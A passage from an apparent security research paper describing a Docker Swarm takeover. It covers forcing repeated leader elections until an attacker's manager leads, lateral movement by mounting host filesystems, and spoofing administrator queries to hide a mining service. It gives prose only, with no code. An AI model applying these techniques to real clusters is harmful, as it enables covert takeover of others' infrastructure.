*2.2. Leader Election*

Raft [2] is a consensus algorithm used to manage a replicated log. Raft was designed with the aim of producing an efficient and understandable algorithm which, unlike Paxos [6–8], would be easy to learn and use in practical systems. Raft was chosen in Docker Swarm due to its important features:


Raft assumes that all nodes are honest and is not tolerant to malicious (Byzantine) nodes participating in the leader election process.

Byzantine fault tolerant (BFT) leader election algorithms have existed for a long time. These algorithms provide the ability to overcome failures in networks where some nodes are Byzantine. For example, Castro et al. [9,10] described a state machine replication algorithm able to tolerate Byzantine faults. The algorithm guarantees safety, i.e., each replicated log is agreed on by all non-faulty nodes.

Bessani et al. [11] introduced an open-source Java library implementing robust BFT state machine replication. Key features of their implementation include reliability, modularity, and a flexible application programming interface (API). Moreover, their implementation achieved good performance and can tolerate real world faults.

Castro et al. [9] implemented a BFT library, that can be used to build highly available systems that tolerate Byzantine faults. Castro et al. used the library to implement a Byzantine-fault-tolerant NFS file system. They showed that the replicated library can be even more efficient than the non-replicated version of NFS.

#### **3. Related Work**

When attacking a cloud based application, an adversary may exploit classical application vulnerabilities, such as SQL injection, buffer overflow, command injection, etc. Using such vulnerabilities, an attacker can control the victim's container and data inside it. Container escape exploits are another technique class; in this case, after successful container exploitation, the attacker exploits a vulnerability allowing the attacker to escape from the container to the underlying host. Access to the underlying host grants an attacker access to data and other containers that run on the compromised host.

There are many products and protocols that try to mitigate the above-mentioned techniques. First, Docker offers built in protections (https://docs.docker.com/engine/ security/ (accessed on 8 July 2021)), such as protecting the Docker daemon socket and using data encryption between the Docker daemon and public registries. These protections harden Docker hosts with a "security in depth" approach. In addition, software, such as SE-Linux and App-Armor, can help harden container isolation and minimize the attack surface between containers and the host. Furthermore, Docker offers an image scanning service (https://docs.docker.com/engine/scan/ (accessed on 8 July 2021)), which can detect vulnerabilities in Docker images.

In the rest of this section, we overview the previous work on cloud security related to Docker. Table 1 summarizes the main differences from related works.

Singh et al. [12] demonstrated primary techniques used by attackers to attack cloud services. There are many potential attack vectors that attackers can use, including: DoS and DDoS attacks [13,14], malware injection, and side-channel attacks [15–18]. In their study, Jensen et al. [19] demonstrated an attack on the software of the cloud itself and outlined the threat of flooding attacks on cloud systems. The authors suggested improving the cloud's security by first improving the security of frameworks used in the cloud.

In [20], Liu et al. provided an overview of the latest technologies in cloud computing and discussed how Docker is integrated into it. According to Liu et al., the major difference between classic VM and containers is that a VM contains not only the application and its dependencies but also the entire guest operating system. The authors listed rapid application deployment, portability across machines, lightweight footprint, and minimal overhead as the main advantages of Docker over traditional VM-based virtualization software. Moreover, in [21], Marathe et al. overviewed the process of the setup of a computer cluster based on Docker Swarm and Kubernetes and evaluated each one of these platforms.

Xavier et al. [22] performed numerous experiments in order to evaluate the performance of container-based cloud environments compared to VM-based cloud environments as well as the trade-off between performance and isolation. They found that the cloud environment would benefit from container-based solutions, due to the fact that container-based solutions achieve near-native performance.

**Table 1.** Comparison with related works.


Other research [28] suggested a new attack surface in the Docker environment: namely indirect adversaries. Unlike a direct adversary, who exploits vulnerabilities in the cluster directly, an indirect adversary exploits third party appliances (e.g., Docker Hub) in order to attack Docker's environment.

An overview of attack types and mitigations in cloud environments is shown in [26]. Among others, Amara et al. mentioned SQL injection as "application level attack", which is used to obtain an initial foothold in the cluster. Moreover, they mentioned hypervisor attacks as "VM level attacks", which are used for privilege escalation and breaking VM isolation. In addition, they offered mitigations to each one of the attacks that they describe.

Moreover, Wu et al. [23] evaluated the security of container based cloud services. They defined metrics upon which they evaluated a number of services. Among others, they specified "privilege escalation" metric and "container escape" metric. They found

that, although there are some services that failed in the "privilege escalation" metric, the "container escape" metric was very high, which limits the impact of the attacker.

In his master's work, Kabbe [27] compared the security model of containers to hypervisor-based systems and virtual machines. He compared the outcome of known attacks (DirtyCow, (https://nvd.nist.gov/vuln/detail/CVE-2016-5195 (accessed on 8 July 2021)) Heartbleed, (https://nvd.nist.gov/vuln/detail/CVE-2014-0160 (accessed on 8 July 2021)) and Shellshock (https://nvd.nist.gov/vuln/detail/CVE-2014-6271 (accessed on 8 July 2021))) in a containerized environment, with the outcome of the same attacks performed in hypervisor/virtual machine environments. He found that containers offered at least the same amount of security as hypervisor/virtual machine environments.

In his master thesis [25], Seather reviewed the underlying security of the Docker Swarm infrastructure. Namely, Seather tested many adversarial scenarios, including: flooding the orchestrator with invalid/corrupted requests, sniffing the network from within the cluster, impersonating a cluster member, performing man-in-the-middle attacks between containers within Docker's internal network, and more. The conclusions of his thesis were that Docker's infrastructure is secure, Docker Swarm's design is good (from a security point of view), the technology stack used by Docker is immune to known attacks, and the development community responds quickly to security incidents.

Attacking the cloud's infrastructure is also shown in [24]. In their work, Linetskyi et al. showed and utilized a Kubernetes privilege escalation exploit, in which an attacker can obtain a root privileges inside a container. If the container is misconfigured, this can result in root privileges to the underlying host. The bug resides in Kubernetes's management tool, which stresses the fact that extra care should be made to secure the code of the infrastructure (in that case, Kubernetes).

#### **4. Taking over the Docker Swarm**

In this section we present the new techniques that can be used to take over a Docker Swarm cluster. We present a full exploit chain starting with existing container escape exploit. When combined with our leadership hijacking technique it ultimately gives the attacker cluster leader privileges. Later, we show how our malicious payloads can be used to completely compromise cloud environment while evading detection.

#### *4.1. High-Level Overview*

A high-level overview of the end-to-end attack scenario can be seen in Figure 1. The attack consists of five major steps:


In order to demonstrate the feasibility and impact of the leadership hijacking technique and the malicious payloads, we developed an end-to-end attack scenario that shows how an external attacker can chain exploits seen in the wild with our technique and payloads, in order to obtain full control of a cluster. A detailed description of this scenario is provided in Section 5. Steps 1 and 2 are implemented in order to demonstrate the feasibility of our work, but they are not elaborated upon, since they are out of the scope of our research.

#### *4.2. Leadership Hijacking*

In this section, we introduce an adversarial technique named leadership hijacking. A precondition to employing this technique is code execution access to a manager node.

In Section 5, we show how this precondition can be achieved in a production environment. From now on, we will refer to the manager host compromised by the attacker as the attacker's manager. The main idea of our technique is to repeatedly trigger a leader election phase until the attacker's manager becomes the cluster leader.

The technique's pseudocode is shown in Algorithm 1.



As shown in Algorithm 1, the first step of the technique is to identify the current cluster leader. If the current leader is the attacker's manger, the technique's code will exit. Otherwise, the technique starts a loop.

In each loop iteration, the technique demotes (i.e., removes from the leader role) the current cluster leader using the Docker's demotion API [29]. This will cause the cluster to initiate a leader election algorithm and elect a new leader. The first manager that reaches timeout proposes itself as the cluster leader. Afterwards, each manager votes in favor of one manager, and the manager that receives the majority of the votes becomes the new cluster leader.

In the final step of the iteration, the current cluster leader is identified again. If the attacker's manager is the leader, the technique exits. Otherwise, it will continue the loop until the attacker's manager becomes the cluster leader. To avoid being detected through repeated reduction in the number of available managers, the attacker promotes the demoted node back to the manager role [30] by the end of each leader election.

In order to prove that the technique works in practice, we implemented the pseudocode shown in Algorithm 1. We set up a lab to test the implementation, and its architecture is illustrated in Figure 3.

Running our technique's implementation in the lab was successful: the attacker was able to escalate privileges in order to become the new cluster leader.

#### 4.2.1. Analysis

#### Convergence

In each iteration, the technique code demotes the leader. According to the Docker Swarm documentation, a manager that does not receive the heartbeat from the leader during the predefined time window assumes that the leader is unavailable and proposes itself to be the new cluster leader. Since the leader has been demoted, none of the managers receive the heartbeat from the leader, and hence a new leader election phase will start when the first manager reaches its timeout.

**Figure 3.** Overview of the lab architecture.

Docker Swarm closely follows the specification and implementation of Raft where the election timeout (the time a node waits before starting a new election) is randomly drawn from a predefined range. In addition to the election timeout, the probability of every manager becoming a leader depends on the communication delays and may not be the same for all managers [31]. Yet, it is safe to assume that in a properly configured swarm, every manager has a roughly equal probability to be elected.

In the absence of an attacker, each leader election is independent of the previous iterations of leader election. This stems from the fact that Raft nodes do not maintain any state concerning the leader election process except being a follower, a candidate, or a leader (Temporarily, there may be more than one node in a leader state due to collisions, which are solved by Raft). The attack introduces a slight dependency between iterations due to the absence of the previous demoted leader in the set of candidates.

The absence of a candidate cannot reduce the probability of the attacker's manager being elected. Thus the probability of the attacker's manager to be elected during each attack iteration is bounded from below by the probability of the respective manager to be elected without the attack. The positive probability of the attack success in each iteration and the ability of the attacker to continue demoting the leaders guarantee the eventual success of the attack.

The positive probability of the attack success in each iteration and the ability of the attacker to continue demoting the leaders guarantee the eventual success of the attack. In a properly configured system where each manager has the same probability to be elected, the number of managers is the mean number of leader elections until the attack succeeds.

#### Advantages

The first advantage of the technique is its simple implementation. In order to prove its feasibility, we decided to implement the technique in the most simple way possible. After reviewing the Docker Swarm API, we realized that our technique could be implemented with repeated calls to demote and promote API [29,30]. This simple implementation makes our technique stable and reliable.

The second advantage of our technique is its stealthiness. A typical attacker would like to stay undetected as long as possible while in an engagement. Our technique can be implemented in many ways; however, some are rather loud, which will increase the chance to get caught by the system administrators. For example, an attacker can demote all other managers of the cluster and become the only manger and, hence, the cluster leader. The obvious issue of this implementation is that the system administrators will quickly notice that the cluster state has changed. On the other hand, our implementation's changes to the cluster state are minimal, which makes it harder to detect the technique.

#### Limitations

The main limitation of our technique is that it is probabilistic. Although we showed that our technique completes successfully with probability *P* → 1, the number of iterations in each execution may differ. An unknown number of iterations is particularly problematic in a real-world scenario.

#### *4.3. Malicious Payloads*

In order to illustrate the impact of the leadership hijacking technique, we developed malicious payloads that use cluster leader privileges and used them to perform some malicious operations.

Typically, an attacker who has access to one host inside a cluster would like to spread and obtain a wider foothold in the cluster. Ideally, the attacker would like to have access to all hosts in the cluster, with high privileges in each host. Moreover, once the attacker controls a cluster they would like to remain undetectable by the users/system administrators for as long as possible.

To achieve the above goals, the attacker has to find a way to spread inside the cluster and hide their malicious activity from users and monitoring tools. In this work, we introduce and develop two types of malicious payloads: a lateral movement payload and a defense evasion payload. These payloads utilize leader privileges and allow an attacker to execute high privileged code on every node in the cluster and hide from monitoring tools.

#### 4.3.1. Lateral Movement

Typically, an attacker would like to establish a wide foothold in a cluster, preferably with high privileges. In this work, we create a payload that enables lateral movement in the cloud. Using this payload, we demonstrate how an attacker with leader privileges in a Docker Swarm cluster can execute high privileged code on each host in the cluster.

Due to the fact that, after successful execution of leadership hijacking, the attacker gains leader privileges, the attacker can control all messages that come out of the leader node. By hooking the leader's function responsible for sending messages between the leader and other nodes, the attacker can change these messages and alter their content.

In order to execute code on other nodes in the cluster, the attacker who is in control of a leader host can send the victim node a task to run. The attacker instructs the worker to run a container task with an image controlled by the attacker. As we show in Section 5, the victim node will execute the container. The container's image will be a malicious image.

However, the malicious container runs in an isolated environment in the host. As discussed in Section 3, containers run in a separate namespace from the host. Thus, for example, a process inside a container cannot sniff the host's network.

There are many ways to overcome this limitation. In addition to controlling what image the container will run on each host, the attacker also controls the creation flags of the

container. Thus, for example, the attacker can mount the main file system of the host to the container. Then, from inside the container, the attacker can alter the host's executable files with a malicious code. In order to obtain highly privileged code execution, the attacker has to alter a file that is executed by a highly privileged user on the host. When the user executes the file, the attacker's malicious code will get executed as well, resulting in high privileged code execution on the host.

#### 4.3.2. Defense Evasion

With the above lateral movement payload, the attacker can spread and move laterally by deploying service with malicious image to every host in the cluster. In this subsection, we show how an attacker can stay undetected in the cluster and hide malicious activity from the cloud's management tools. We introduce the cloud defense evasion payload, which offers rootkit-like functionality in the cloud.

In this subsection, we assume that the attacker is the cluster leader and has a malicious service in the cluster, which they wish to hide from system administrators, e.g., a malicious cryptocurrency mining service.

The default Docker Swarm command line offers a rich variety of commands for cluster administration. In particular, Swarm offers the docker service (https://docs.docker. com/engine/reference/commandline/service/ (accessed on 8 July 2021)) command for viewing and updating services that run on the cluster. In order to view services that run on the cluster, the system administrator can issue the docker service ls (https: //docs.docker.com/engine/reference/commandline/service\_ls/ (accessed on 8 July 2021)) command and view its output. The output includes the service's name, image, number of replicas, exposed ports, etc.

In order to obtain this information, the Docker daemon of the host that issued the command queries the leader of the cluster and retrieves the information from the leader.

However, the attacker is in control of the leader host. Hence, the attacker can hook the function that returns this information on the leader's Docker daemon and spoof the answers. In this way, the attacker can change malicious service's name, image, ports, or even the service itself (i.e., the attacker can trick the user into thinking that there is no such service at all, by removing any information related to the malicious service).

In a similar manner, the system administrator can view what containers are running for each service. Using docker service ps (https://docs.docker.com/engine/reference/ commandline/service\_ps/ (accessed on 8 July 2021)) command, the system administrator can obtain information about a container's image, name, state, etc. In a similar way to the docker service ls command, the issuing host queries the leader host and retrieves that information. The attacker has access to the leader host, and thus they can alter that information as well. By doing so, the attacker can trick the system administrator and show them that a container is running a different image than the real image, for example.

In this way, the attacker can hide malicious activity from Docker's default tools, which query the cluster leader to obtain information about objects (running services, containers, etc.) in the cluster.

#### **5. End-to-End Attack Showcase**

To prove that our leadership hijacking technique and malicious payloads are feasible, we implemented a combined scenario that demonstrates the impact of our technique and of the payloads. We show the importance of our technique and payloads, as well as that the initial assumption regarding the attack is reasonable. We provide proof-of-concept demonstration of an external attacker leveraging an exploit, which has been seen in the wild together with our leadership hijacking technique and malicious payloads, in order to ultimately control the entire cluster.
